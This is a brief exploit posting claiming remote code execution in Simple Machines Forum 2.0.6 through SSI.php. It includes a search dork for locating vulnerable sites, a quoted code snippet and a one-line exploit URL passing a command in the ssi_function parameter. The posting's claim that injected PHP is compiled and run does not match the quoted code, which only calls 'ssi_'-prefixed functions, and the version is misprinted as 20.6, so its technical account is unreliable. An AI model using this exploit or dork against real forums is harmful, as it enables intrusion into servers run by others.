facebook facebook twitter rss

SMF Code Execution

Author: Tr0jaN_Dz.eXe , Published: 03-01-2014
################################################################################
#
# Exploit Title : SMF Code Execution #
# Author : Tr0jaN_Dz.eXe
#
# Discovered By : Jackers
#
# Home : fb.me/th3jackers
#
# Software Link : http://download.simplemachines.org/
#
# Security Risk : high
#
# Version : 20.6
#
# Tested on : win7 x64 (localhost
#
# Dork : powered by SMF 2.0.6
#
################################################################################

file : SSI.php

vulnerable code:
if (isset($_GET['ssi_function']) && function_exists('ssi_' . $_GET['ssi_function']) && (!empty($modSettings['allow_guestAccess']) || !$user_info['is_guest']))
{
call_user_func('ssi_' . $_GET['ssi_function']);
exit;
}
if (isset($_GET['ssi_function']))
exit;


Description:
- An attacker might execute arbitrary PHP code with this vulnerability. User tainted data is embedded into a function that compiles PHP code on the run and executes it thus allowing an attacker to inject own PHP code that will be executed. This vulnerability can lead to full server compromise.

exploit :

localhost/smf/SSI.php?ssi_function=!command!

################################################################################

Like us on Facebook :